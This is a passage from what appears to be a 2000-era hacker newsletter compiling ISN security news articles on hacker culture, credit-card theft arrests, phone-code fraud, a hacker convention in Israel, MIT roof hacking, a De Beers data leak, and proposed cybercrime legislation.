libertarian ethos that places a high value on the free flow of
information. As a result, hackers often post techniques that can be
used to crack system security. They argue that unauthorized hacks into
systems are the only way allow security techniques - as well as
technology - to fully evolve.
"I'll be the first to admit there are a lot of gray areas," says
Simple Nomad, who runs Nomad Mobile Research Centre, a Web site that
provides information on the security flaws in computer systems. "I've
written tools that I know can be used for people to test their system,
but I also know someone can turn around and use the same tools to
break into a system."
In the mid 1990s, as many in the Internet industry began clamoring for
ways to protect against these intrusions, Congress passed legislation
that made hacking a crime. Last week, Max Vision, the hacking alias of
Max Ray Butler, was held on $100,000 bail after being indicted for
breaking into government systems including NASA and the Department of
Defense.
The hacker community, however, bristles at being lumped with acts like
last month's "denial of service" attacks against Internet behemoths
like Yahoo! and eBay, attacks that lacked the technological
sophistication they value. Many have tried to distinguish hackers from
"black hats" or "crackers," who crack into systems to steal credit
card information or do some kind of damage.
"A lot of the underground isn't looking at this as a major hack, or
even as a genuine act of hacking," says Space Rogue, editor of Hacker
News Network and a computer scientist for security consortium
@stake.com.
A. Anonymous, a former "black hat" hacker who wrote the best-selling
book "Maximum Security," was one of the first to give detailed
information on how to crack a system's security. "All these other
security books, not one of them taught you how to break into
anything," he says. "But because there are standard things you must do
to secure your system, you first need to know how the attacks work."
Some of the roots of hacking come out of the "phone phreaking" of the
1970s.
According to the Hackers' Hall of Fame, the hacker Cap'n Crunch became
a legend when he figured out how to reproduce the tone that authorizes
long-distance service with a toy whistle from a cereal box. Later,
many people - mostly kids - manipulated pay-phone wires with a paper
clip to get "free" long-distance. As networks connected by phone wires
began to evolve, so did the various ways to furtively plug into them.
As young hackers explored the source code of systems, they began to
think of ways to do it better. The result was a highly competitive
community where, like playground basketball, a hacking "star" performs
exploits that could become legendary.
"When something is posted, immediately that motivates some people to
want to do something better," says A. Anonymous. "As a result, ideas
are being exposed to an evolution at an extremely rapid pace."
Though Simple Nomad says he no longer breaks into systems, he notes
that his Web site is listed as criminal on most Web-blocking software.
"Which is unfortunate," he says, "because 9 out of 10 e-mails I get is
from a system administrator saying 'Thank you, I used the stuff on
your site to take care of my system.'"
More and more, Internet security companies are using the techniques of
the hacker underground to make systems more secure. And many of the
old phone phreakers and black-hat crackers are being hired. "You stick
with it long enough," says A. Anonymous, "and you shed the purple hair
and put on a suit and tie."
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
@HWA
234.0 ISN:Curador worked as e-commerce consultant.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.internetnews.com/ec-news/article/0,2171,4_328071,00.html
Before he was arrested by police in Wales last Thursday, the online
credit card thief who called himself "Curador" worked as an e-commerce
consultant, his former boss revealed Monday.
As previously reported, an 18-year-old man in Clynderwen, Wales was
arrested Thursday in connection with break-ins at nine e-commerce
sites in recent weeks. Under U.K. law, Curador's name was not released
by police, but the Britain's Daily Telegraph reported Saturday that
Curador's real name was Raphael Gray. The true name of his accomplice,
who was also arrested, was not disclosed.
While he was allegedly breaking into online stores in the United
States, Canada, Thailand and Great Britain, Gray was also working to
develop an e-commerce strategy for Console King, a mail-order company
in Narberth, Wales.
According to Sam Lee, managing director, the retailer of video games
and DVDs hired Gray around Christmas 1999 on the recommendation of a
job recruitment firm.
"[Gray] told us that he worked for several companies, including a
subsidiary of Microsoft. And he showed us some of the work he had
done, and it was pretty good. As far as we knew, he had no criminal
record," said Lee.
Console King paid Gray about US$6.50 to build the company an online
storefront. But Lee said he fired Gray in the beginning of March after
Gray began failing to show up for work. Only last week did Lee know
that Gray had allegedly been involved in the online theft of about
26,000 credit cards over the course of six weeks.
"We couldn't believe it. He's put my company and my staff in jeopardy.
He's so stupid he doesn't know what he's done," said Lee, who added
that Console King has tightened security at its site since learning of
Gray's true identity.
Gray has been released on bail and according to Lee has been seen on
the streets of Clynderwen, which has a population of 550.
FBI officials declined to comment on whether Gray had used any of the
stolen card numbers to place fraudulent orders. Britain's Daily Mail
newspaper quoted a detective who said police had confiscated "a pile
of stuff" from the homes of Gray and his accomplice.
Gray also apparently used a card stolen from an online retailer named
Albion's MO to register one of the sites where he posted stolen card
numbers and diatribes about e-commerce security. According to Robert
Koseluk of Carmel, Indiana, he received an unauthorized charge for
$198 to register and set up a site at free-creditcard.com. Gray also
apparently used a card stolen from Stacy Yaple of Jacksonville, Fla.,
to register another site, e-crackerce.com.
Lee of Console King said that Gray apparently had financial problems.
Lee also said Gray would often borrow small amounts of money from him.
"He never had any money. I had to lend him money for a haircut and for
lunch. He came into work stinking and wore the same clothes everyday.
I had to speak with him about his personal appearance and hygiene,"
said Lee.
At his Web sites, Gray has argued that he broke into other sites to
shame operators into improving their shoddy security. Tim Ward, owner
of feelgoodfalls.com, a site that Curador hit around the end of
February, said Curador has had his desired effect.
"There's some good that came out of this. We never intended to expose
anybody's card numbers, but what he did resulted in us being more
secure," said Ward, who revealed that his mother-in-law built the site
at feelgoodfalls.com using Microsoft StoreFront. In the wake of the
break-in, Ward has hired a security consulting firm to batten down the
hatches.
Michael Vatis, director of the FBI's National infrastructure
protection center, said Friday that regardless of a cracker's motives,
breaking into a site is still a federal crime.
"If someone gains unauthorized access to a computer that's engaged in
interstate or foreign commerce, that access is a federal crime,
whether the state of security is poor or excellent," said Vatis.
Reuters reported Sunday that one of the credit cards that Curador had
stolen belonged to none other than Microsoft Chairman Bill Gates. The
report apparently was based on information gleaned from one of
Curador's Web sites where he posted stolen credit card numbers.
But that site, which is mirrored here, contains information suggesting
the Reuters report is inaccurate. For example, the credit card number
Curador posted and claimed was Gates' has only 12 digits, and the
first four do not match any algorithms used by Visa, Mastercard,
Discover, American Express, or any of the other major credit card
companies.
A spokesperson for the U.S. Secret Service, which investigates credit
card fraud, would not comment on Curador's claims, although he did say
that the card appeared to be missing numbers.
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
@HWA
235.0 ISN:White house official charged with spreading phone codes
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://dailynews.yahoo.com/h/nm/20000327/tc/crime_whitehouse_1.html
By Gail Appleson, Law Correspondent
NEW YORK (Reuters) - A U.S. Army sergeant has been charged with giving
out long distance White House telephone access code information that
allowed individuals to charge some 9,400 calls worth $50,000 to the
federal government, prosecutors said on Monday.
David Gilmer, who was assigned to the White House Communications
Agency, was arrested late Friday in Virginia on a criminal complaint
filed in Manhattan federal court that alleged the calls were made over
the last few months.
The WHCA provides telephone service to Executive Branch agencies and
departments including the President, Vice President, White House
Senior Staff, National Security Council, U.S. Secret Service and
others as directed by the White House Military Office.
AT&T provides the long-distance phone service for the WHCA.
No information was immediately available on the identities of those
who used the information or if Gilmer made any profits from giving it
out.
The White House said Gilmer is no longer attached to the
Communications Agency but had no further comment on the matter.
Prosecutors said those involved in the scheme were able to use the
White House code in much the same way consumers use telephone calling
cards. However, in this case the WHCA was billed for the calls instead
of the users.
According to court papers, individuals called a WHCA toll-free number
and entered a numerical code. They then heard a dial tone and were
able to make long distance calls.
AT&T told investigators that about 9,400 unauthorized calls were made
between about Dec. 5, 1999, and Feb. 8. Some of these calls were made
from phones in New Jersey and New York City. WHCA was billed about
$50,000 for the calls.
AT&T and Bell Atlantic provided authorities with subscriber
information for several of the residential and business telephone
lines on which the calls were made and search warrants were obtained
for those properties.
In searching one of the New Jersey properties, agents said that said
one individual admitted using the WHCA toll-free number and code since
September 1999.
The unidentified individual allegedly told authorities the information
came from Gilmer. According to court papers, the individual had
Gilmer's business card identifying him as an employee of the WHCA
assigned to the Presidential Communications division.
On March 17 the individual consented to be taped by federal agents
when that individual called Gilmer. The individual asked Gilmer for
another WHCA code to avoid being billed for a long distance call.
Gilmer allegedly provided the code.
The individual made a second taped call on March 22 and during the
conversation Gilmer allegedly admitted giving access codes to other
individuals.
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by Security-Focus.COM
@HWA
236.0 ISN:Hackers hold conference in Israel
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.lasvegassun.com/sunbin/stories/tech/2000/mar/30/033000707.html
JERUSALEM (AP) [3.30.2000] -- Hackers from around the world overcame
interrogations, censorship and an all-around bad image to hold
Israel's first hacker convention, wrapping up the two-day conference
Thursday without a glitch.
The 350-strong gathering was the first of its kind since the Yahoo!
and eBay commercial sites were crippled in February, reminding
companies across the globe of the dangers hackers can pose.
At the request of lawmakers, Israeli police had considered banning the
conference, but Attorney General Eliyakim Rubinstein gave the
go-ahead.
One of the original hackers, John Draper of Fremont, Calif., said the
hackers wanted to put a better face on the practice.
"A hacker is a person who is developing programs to make them better,"
Draper told The Associated Press. "They aren't the kind of people who
break into computer systems. That's a cracker."
Draper, known by the handle "Captain Crunch," helped launch the hacker
phenomenon. In 1971, he discovered that a toy whistle from a cereal
box reproduced the tone needed to open a free telephone line.
Aware of his fame, Israeli security agents at the Los Angeles airport
interrogated Draper for an hour, he said, and thoroughly searched his
computer equipment before allowing him on the plane.
"There were many attempts to silence us on this," organizers said in a
summary of the gathering, released on their Web site.
Police prevented the organizers from publishing one of the results of
the conference: a list of vulnerable Israeli commercial Web sites.
To compile the list, participants played "HackTheseSites" with sites
offered up by Israeli companies. The site owners were confident no one
could thwart them, but they were wrong.
When they weren't eating pizza or guzzling soda, the hackers sat bent
over their computer screens. They discovered that 28 percent of the
Israeli net is vulnerable -- about the same proportion as the rest of
the world, according to organizers.
Police were invited to attend the conference and even to speak, but
they turned down the offer, creating the game "Spot the Fed."
Participants were given the challenge of finding plainclothes
policemen among them. If a person pointed out as suspicious was in
fact a security official, the official was to get an "I am the FED"
T-shirt, and the spotter an "I spotted the FED" shirt. But none were
found out.
Israeli lawmaker and former Science Minister Michael Eitan accepted an
invitation to attend. He said that hacker games like those displayed
at the conference were meant more to entertain ambitious youngsters
than cause harm.
"I told them that as long as they all enjoy the freedom of the
Internet and don't abuse this freedom, and make the public support
police intervention, this will work," Eitan said in a telephone
interview.
Participants also got to speak to their guru -- convicted cyberbandit
Kevin Mitnick -- in a conference call. The 36-year-old American
bemoaned the strict probation terms that ban him from using a computer
or any hi-tech device.
Mitnick was released last year after serving five years in jail for
breaking into the computer systems of some of America's biggest
companies, including Motorola Inc., Novell Inc. and Sun Microsystems
Inc.
"He had a lot of sympathy in the room -- we all know not being able to
touch a computer is a worse punishment than even being in jail," said
Neora Shaul, a Tel Aviv computer programmer who helped coordinate the
conference.
--
On the Net: Conference organizers at http://www.neora.com
John Draper's site at http://www.webcrunchers.com
Hackers' site at http://www.y2hack.com
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by SecurityFocus.com
@HWA
237.0 ISN:Old school MIT stylie "hacking" still makes news?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.boston.com/dailyglobe2/090/metro/_Hackers_skirt_security_in_late_night_MIT_treks+.shtml
By David Abel, Globe Correspondent, 3/30/2000
CAMBRIDGE - Like shadows they scurry through the night, dressed in
black, armed with head-mounted flashlights, walkie-talkies, ropes,
pocketknives, lock -picking tools - and their student ID cards.
They call themselves ''hackers.'' But these Massachusetts Institute of
Technology students shouldn't be confused with those who sabotage
computers. They have a more lofty goal: to bypass locked doors, slide
through off-limits shafts and tunnels, and explore the bowels of
campus buildings.
Most Saturday nights, groups of less than a dozen students seek
adventure by searching for anything from the fabled bricked-in shower
to the Tomb of the Unknown Ladder.
''It's a lot like rock climbing or caving,'' said Jeremy Brown, 27, a
computer science graduate student and veteran hacker. ''For us, it's
about interrogating the environment, and learning from it.''
But there's another, less appealing side of hacking: the danger. Last
November a student was seriously injured after falling through a roof.
Many of the hundreds of hackers are reluctant to talk about their
underground pastime. They fear news reports will only push college
officials to clamp down. ''You see, the more detail we give,'' Brown
said, ''the more we're shooting ourselves in the foot.''
Still, hacking is anything but a secret at MIT. If they haven't done
it themselves, almost any student on campus could name a friend who
has. In fact, during freshman orientation week every year,
upperclassmen take large groups to tour the innards of MIT's
infrastructure.
But college officials insist that they don't turn a blind eye to what
is known as ''roof and tunnel hacking,'' a variation or sometime
precursor to another form of hacking: practical jokes. MIT students
are famous for inventive pranks that require engineering finesse and
are often done to coincide with April Fools' Day, such as placing a
replica of a campus police cruiser atop the school's Great Dome.
''We definitely don't encourage it,'' said Lawrence S. Bacow,
chancellor of MIT. ''We lock the roofs, we alarm doors, and we have
fined students when they're where they shouldn't be. It's certainly
not like we say, `Here's a roof; come climb on it.' Far from it.''
With students routinely ignoring ''no entrance'' signs, groping their
way through unlit pipe rooms, boiler tunnels, and high-voltage areas
meant only for specially trained maintenance crews, safety has long
concerned administrators.
But the culture of hacking recently has come under increased scrutiny.
About 3 a.m. on a Sunday morning in November, an 18-year-old woman
plunged 96 feet down a chimney. The freshman from Pennsylvania, whose
name MIT won't release, is recovering from major spinal cord injuries
after falling off the roof of the Sloan School of Management building.
While administrators say the student's injury is the worst hacking
accident in memory, they know the college was very close to having a
fatality - and they say they're doing everything in their power to
stop it.
''One injury is one injury too many,'' Bacow said. ''We took this very
seriously. She could have died - easily. She was lucky.''
Even with fines of up to $500 for trespassing, improved locks and
alarm systems, and constant admonishing by administrators, MIT hackers
are not daunted. If anything, they say, they see the obstacles as a
challenge to be overcome.
''A lot of hacking is about creativity, finding a way around a locked
door or something,'' said a 22-year-old senior majoring in biology,
who used to hack and asked that she not be identified. ''Hackers are
generally students who question authority and don't pay attention to
rules.''
Yet hackers insist they consider safety paramount. Before taking out
novices, usually recently recruited freshmen, they pass out laminated
yellow cards titled, ''Hacking Ethics.'' The cards are also used as a
way to open doors.
The pithy precepts include: ''Don't drink and hack;'' ''Don't hack
alone;'' ''Leave no permanent damage;'' ''Be subtle - leave no
evidence that you were there;'' and contrarily, ''Don't steal
anything, but if you must borrow something, remember to return it -
perhaps leave a note saying when it will be returned.''
But risks rise when hackers obey their 11th Commandment: Don't Get
Caught. According to ''A Brief Guide to Hacking,'' part of a pamphlet
published by MIT's Technology Communication Association and circulated
to incoming freshmen, hackers ''shalt honor [the commandment] and keep
it wholly.''
After detailing specific evasion tactics - such as, ''always have two
ways to run,'' or when fleeing, ''change floors often'' - the guide
offers up these alibis if caught: ''Is this the way to Baker House?''
or ''Where's the nearest bathroom?''
Rarely, however, do students get caught in such a bind. According to
MIT campus police, fewer than a dozen students a year are cited for
hacking. Yet on any given night, as many hackers may be trolling
through the Earth, Atmospheric, and Planetary Sciences building or the
domes towering above the Infinite Corridor.
''It's a difficult thing to prevent,'' said Anne Glavin, chief of
MIT's police force. ''First, this subculture is made up of secret
associations, and they're not exactly inviting us in as guest
speakers. The other thing is these are some of the brightest students.
Staying ahead of them is a challenge. I mean, they are the ones who
are going to be building the security systems in the future.''
The phenomenon of students scoping steam tunnels or climbing through
air ducts for fun reveals the peculiar environment of grouping some of
the nation's smartest science-oriented students, administrators and
alumni say.
At the elite institution, where many of the students grow up taking
pleasure more from solving a quadratic equation than in things like
watching Sunday football, students often are eager to craft their own
brand of entertainment.
Throw in a dollop of curiosity and a bent toward ingenuity and you
come up with students interested in hacking, according to Jeff Bigler,
the former president of MIT Spelunkers club and now an alumnus who
helps chronicle hackers' practical jokes.
''Really, what it comes down to is it's a way to hang out, and beats
drinking beer and bad music,'' Bigler said. ''It's just exploring,
hanging out together and having fun. It's like an outing club.''
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
@HWA
238.0 ISN:US Census tests security
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.fcw.com/fcw/articles/2000/0327/web-1census-03-27-00.asp
Census tests security
By Judi Hasson
03/27/2000
The Census Bureau has hired a company to try to break into its
Internet site and brought in the super-secret National Security Agency
to test Census security systems.
Census officials said they are certain the data is safe but want to
make sure there are no vulnerable spots.
"Every day, people are scanning our ports. Its not just our site. Its
any site, said J. Gary Doyle, who is responsible for systems
integration at the Census Bureau.
Among the steps that the Census Bureau has taken to protect the
decennial count:
* Hiring the technology firm Science Applications International
Corp. to try to break into the Census Internet site, where
respondents can file online. SAIC began working last week,
and there have been no reports of successful entry into the
site.
* Enlisting NSA to make sure the site is secure.
* Erecting firewalls to prevent penetration. Among the
precautions: prohibiting e-mail from entering the site
unless there is a specific address on it and barring
outside computers from dialing up the census computer
in the building.
* Encrypting all census data from the time it leaves a data
scanning center via a secure telephone line until it arrives
at the Census computer center in Bowie, Md.
* Making three copies of the data and storing it in different
vaults.
* Providing backup systems at the Bowie computer center,
including generators and air conditioners.
The Census Bureaus precautions have gotten high marks from security
experts inside and outside government
"Census is using all of the proper security practices," said Richard
Smith, vice president of federal operations at Internet Security
Systems Inc. "I would guess the likelihood of someone getting in is
small."
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by SecurityFocus.com
@HWA
239.0 ISN:Visa program targets online fraud
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Forwarded From: darek.milewski@pl.pwcglobal.com
Visa program will target online fraud
By Rachel Konrad
Staff Writer, CNET News.com
March 24, 2000, 1:10 p.m. PT
URL: http://news.cnet.com/category/0-1007-200-1583717.html
Online retailers will soon receive a list of formal recommendations from
Visa aimed at helping merchants crack down on fraud.
Visa's "best-practices" guide, which will be released within the next
several weeks, will be similar to those the credit card giant has created
for catalog companies that accept credit cards by mail or telephone
without signatures. But the newest guide will target e-commerce companies
for the first time, with tips on how to minimize hacker attacks on
databases and spot potentially fraudulent orders before products are
shipped.
"Internet merchants haven't always come out of the old catalog business,
and sometimes they have little experience in business," said Dave Richey,
vice president for card operations at Visa. "They're often new and often
focused on IPOs and other stuff. Communication between merchant and
cardholder is key in avoiding misunderstandings."
For some e-tailers, Visa's security tips could be considered a case of
"better late than never": Credit card fraud has marred several
high-profile and relatively established online companies in recent months.
Expedia, Microsoft's online travel affiliate, announced earlier this month
that it will record a fiscal third-quarter charge of $4 million to $6
million to cover the cost of fraudulent transactions on its Web site. The
Bellevue, Wash.-based company said stolen credit cards were used to book
travel reservations.
In January, nearly 350,000 credit card numbers were stolen from music site
CD Universe and posted online. A hacker going by the name "Maxus" claimed
to have the numbers and tried to extort $100,000 from the Web site.
The focus on credit card fraud coincides with intense scrutiny of
e-commerce companies by Wall Street investors, many of whom worry that
security breaches could dent revenue.
Unlike credit card transactions at brick-and-mortar companies, in which
the bank that issued the card is usually liable for fraudulent
transactions, online merchants are typically forced to cover the losses.
The financial institution that issues a credit card assumes liability in
about 75 percent of all fraudulent transactions, according to John
Shaughnessy, senior vice president for risk management at Visa. But in
"card-not-present" transactions--when transactions happen by mail,
telephone or Internet and no signatures are obtained--merchants assume
liability for roughly 90 percent of fraudulent transactions.
Although it's impossible to quantify how much money online merchants have
lost to fraudulent charges, experts say the total as a percent of revenue
is anywhere from 1 percent to 30 percent, depending on the retailer and
industry. In general, computer and electronics vendors are more at risk
for fraud than vendors of less-expensive items, such as books, videos or
CDs.
"Security is going to be the critical issue," said Ben Sim, an expert on
e-commerce for New York-based C.E. Unterberg Towbin. "A lot of these
merchants don't understand the implications of fraud, and they're using
home-grown solutions that simply don't work. If you're getting someone
from Romania ordering $50,000 of books, the fraudulent transaction's not
going to happen. But thieves are getting much more sophisticated, and
merchants' security systems aren't necessarily getting better."
According to an Unterberg Towbin study in 1998, more than 50 percent of
disputed (or potentially fraudulent) charges at the Visa European division
came from Internet transactions. However, Net transactions represented
only 2 percent of the division's total transaction volume.
Although many e-commerce executives downplay fraud, their attorneys and
accountants don't.
"Security breaches that result in access to confidential information could
damage our reputation and expose us to a risk of loss or liability," music
retailer CDNow stated in a 10K filed with the Securities and Exchange
Commission in 1998. "We may be required to make significant expenditures
and expend considerable personnel effort to protect against security
breaches or remedy problems caused by these breaches. We cannot assure
that our security measures will prevent such breaches."
Other companies are even more blunt:
"We cannot assure you that our security measures will prevent security
breaches, and such breaches could expose us to operating losses,
litigation and possible liability," read a 10Q filed by Egghead.com last
November.
Amazon.com stated in a fall 1999 10Q filing: "Computer viruses, physical
or electronic break-ins, and similar disruptions could cause system
interruptions, delays and loss of critical data and could prevent us from
providing services and accepting and fulfilling customer orders.
"Although we have developed systems and processes to mitigate fraudulent
credit card transactions, failure to prevent such fraud may impact our
financial results."
Tom Holland, director of fraud detection and prevention for Amazon, said
such warnings are worst-case scenarios, not daily concerns.
"Amazon's fraud losses in comparison to sales revenues--it's minuscule,"
Holland said. "I can't tell you the dollar figure. It's large, but as a
percentage of sales, it's insignificant."
Holland said the company is continually upgrading its security system and
cooperating with law enforcement to tackle fraud. Amazon and the sheriff
of Fairhope, Ala., just completed a case in which a ring of thieves were
using card numbers secured from an online "hack shack" of credit card
numbers to buy books.
"They'd go to a house for sale, rip down the for-sale sign, and have
deliveries go there," Holland said. "They took us for $3,000, but we're
getting it all back."
Although online credit card fraud can damage retailers, security experts
say, Internet transactions are extremely safe for consumers.
Consumers whose cards are used fraudulently online rarely are responsible
for the bills because they don't sign a receipt. In the physical world,
consumers must pay up to $50 of fraudulent transactions if they fail to
report a stolen card or carelessly distributed credit card information.
"The people who end up eating it are the merchants," said Paul Wasserman,
chief executive of Internet shopping portal Ebates.com and a former
high-tech crime prosecutor in Silicon Valley. "If you're a merchant
exercising due diligence, you're supposed to be off the hook. But the
reality is that most of the financial institutions don't let them off."
Many e-commerce executives complain of an adversarial relationship with
issuing banks. Holland said that often, when Amazon calls banks to verify
addresses, the company doesn't get help.
"They can be blas�," Holland said of the issuing banks. "The e-commerce
companies don't get any respect. We're Rodney Dangerfield."
ISN is sponsored by SecurityFocus.com
@HWA
240.0 ISN:GAO lists security bargains
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.fcw.com/fcw/articles/2000/0327/web-cheap-03-30-00.asp
BY Diane Frank
03/30/2000
Agencies can cut their information systems security risks with
low-cost and no-cost solutions, federal experts told Congress
Wednesday.
The General Accounting Office listed six steps that agencies can take
to immediately cut down on their security risks:
* Increase security awareness throughout the organization.
* Ensure that existing controls are operating effectively.
* Ensure that software patches are up-to-date.
* Use automated scanning and testing tools to quickly identify
vulnerabilities.
* Expand the use of best practices throughout the agency.
* Ensure that the most common vulnerabilities are addressed.
In its security audits of agencies, including the departments of
Defense and Veterans Affairs, GAO found that security controls are in
place but that those controls are not being used correctly, said Jack
Brock, director of governmentwide and defense information systems at
the General Accounting Offices Accounting and Information Management
Division.
"Agencies are spending money for tools, but theyre not using those
tools," Brock testified before the House Government Reform Committees
Government Management, Information and Technology Subcommittee. "Tools
are present, but theyre not turned on, theyre not monitored, youre not
sure if theyre working or not."
One agency that has incorporated many of GAOs low-cost solutions into
its agencywide security policy is NASA, which has made many
improvements in security since its GAO audit in 1998, Brock said.
The agency has bought commercial off-the-shelf vulnerability analysis
and scanning tools, but it is augmenting them with freeware and
shareware tools from the Internet. NASA also has developed and
distributed a list of its top 50 vulnerabilities and has built those
into auditing tools at NASA centers so that they automatically scan
for those weaknesses, testified David Nelson, NASAs deputy chief
information officer.
Related link: Text of GAO's Congressional testimony on Wednesday
http://www.gao.gov/new.items/ai00135t.pdf
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by SecurityFocus.com
@HWA
241.0 ISN:DeBeers leaks customer info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://news.cnet.com/news/0-1007-200-1639327.html?tag=st.ne.1002.thed.1007-200-16393271007-200-1639327
By Stefanie Olsen
Staff Writer, CNET News.com
April 4, 2000, 4:45 p.m. PT
On the Web, diamonds can be a spammer's best friend.
About 35,000 customer email and home addresses were exposed on
adiamondisforever.com, an informational site about diamonds sponsored
by De Beer's, CNET News.com has learned.
Chad Yoshikawa, a Bay Area consultant, stumbled across the security
hole today while searching for his home address through a search
engine. The results turned up a little more than he bargained for.
A Web page he found, pulled from the De Beer-sponsored site, lists the
names, phone numbers, home and email addresses of people registered
with the site, along with his own. Yoshikawa, who said his wife
entered a diamond contest through the site, contacted a site
administrator immediately because "it didn't look like they were too
on top of things because it was hard to find the privacy policy."
Jim Greene, system administrator for hosting company Luminant, replied
in the email to Yoshikawa: "We have investigated and fixed the problem
with the site. This area is not active on the site any longer."
The security breach resembles several related "data spills" from Web
sites. Last year, Butterball published the names and addresses of
people who signed up to receive recipes via an online newsletter.
Nissan also exposed a list of more than 24,000 email addresses of its
potential buyers last year.
"This kind of occurrence is all too frequent. (But) the De Beer's
seems especially troublesome because it suggests access to high-net
individuals," said Jason Catlett, president of Junkbusters, an online
advocacy group.
"Who knows how many people have noticed or downloaded the list before
it came to the attention of the media." Catlett said.
Greene said Yoshikawa and CNET News.com were the only ones to spot the
file.
"We have looked into the server logs and see no indications that
anyone besides yourself and someone coming from C-Net accessed the
files," he wrote.
Adiamondisforever.com, which launched in November 1996, is part of The
Diamond Information Center (DIC), a marketing service for De Beer's,
one of the largest diamond producers and marketers in the world.
The site's privacy policy stipulates that the company does not "make
available the email addresses of those who access our site to other
organizations or companies."
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by SecurityFocus.com
@HWA
242.0 ISN:Cybersleuths want to hack bill of rights
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.sfgate.com/cgi-bin/article.cgi?file=/chronicle/archive/2000/04/05/ED11338.DTL&type=tech_article
JAMES P. PINKERTON, Newsday
Wednesday, April 5, 2000
2000 San Francisco Chronicle
More than ever before, Americans are exercising their unalienable
right to life, liberty and the pursuit of capital gains. But what
happens when liberty jeopardizes life -- or the Dow Jones average? And
what happens when the government jeopardizes liberty?
On Tuesday, Sen. Jon Kyl, R-Ariz., convened the Senate Judiciary
Subcommittee on Technology, Terrorism and Government Information to
make the case for new legislation to protect the nation's
``information infrastructure.''
And so began a familiar Washington ritual: Friendly lawmaker invites
friendly bureaucrat to a hearing. Soon, a new law emerges that gives
political credit to the lawmaker and a bigger budget to the
bureaucrat. Kyl began the show with a declaration that ``denial of
service'' hacker attacks on companies such as eBay, Yahoo and CNN
should ``serve as a wake-up call about the need to protect our
critical computer networks.'' Kyl added that ``the attacks contributed
to a 258-point drop in the Dow Jones Industrial Average and halted a
string of three days of consecutive record- high closes of the
technology-laden Nasdaq Composite Index.''
To deal with this problem, Kyl and Sen. Charles Schumer, D-N.Y., have
co-sponsored S. 2092, which would modify the federal government's
``trap and trace'' authority, so that law enforcers would no longer
need to obtain a search warrant in every jurisdiction through which a
cyber- attack traveled.
The first ``witness'' was FBI Director Louis Freeh. After praising Kyl
and his legislation, he reminded his audience of how much the FBI was
already doing to combat the scourge of cyber-crime. Freeh then used
the forum to outline the FBI's entire cyber-agenda, covering everyone
from virus-writers and intellectual property thieves to the ``Internet
Black Tigers,'' a group ``reportedly affiliated with the Tamil
Tigers'' of Sri Lanka. He further noted that unchecked Net-related
stock fraud costs investors $1 million an hour.
Only two more witnesses came after Freeh. One was Richard D. Pethia,
who directs a federally funded cyber-security center within the
Software Engineering Institute at Carnegie Mellon University in
Pittsburgh. Not surprisingly, Pethia was 100 percent behind the joint
Kyl-Freeh effort. The other witness was Harris N. Miller, president of
the Information Technology Association of America, a Washington-based
trade association. Miller was supportive but ambivalent; his worry
seemed to be that high-tech trade secrets would spill into -- and then
out of -- Uncle Sam's databases.
But the real opposition to the Senate bill wasn't heard from
because it wasn't invited to testify.
One likely opponent is the Electronic Privacy Information Center, a
Washington-based cyber-liberties group. ``This is very much a process
being driven by the law-enforcement community,'' lamented Mark
Rotenberg, the group's director.
Another non-invitee was Solveig Singleton, director of information
studies at the Cato Institute, a libertarian think tank in Washington.
``Law enforcement views the Fourth Amendment as the problem,'' she
said. That's the piece of the Bill of Rights that protects ``persons,
houses, papers and effects against unreasonable searches and
seizures'' -- with no mention of e-mail. And so now, Singleton
observed, the FBI wants to force manufacturers to ``build surveillance
into technology,'' all but eliminating the need for search warrants.
The dangers that Kyl and Freeh described are real, but so is the
danger of a government's habitually stomping on privacy rights.
History proves that basic rights are unalienable only when those who
might alienate them are watched
*-------------------------------------------------*
"Communications without intelligence is noise;
Intelligence without communications is irrelevant."
Gen. Alfred. M. Gray, USMC
---------------------------------------------------
C4I Secure Solutions http://www.c4i.org
*-------------------------------------------------*
ISN is sponsored by SecurityFocus.com
@HWA
243.0 ISN:Third laptop gets lifted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.the-sun.co.uk/news/5631664
By JOHN KAY
A SENIOR Army officer has had a laptop computer stolen from under his
nose - the THIRD theft of sensitive files in a month.
The 50,000-a-year (U.K.P.) lieutenant colonel fell victim to an
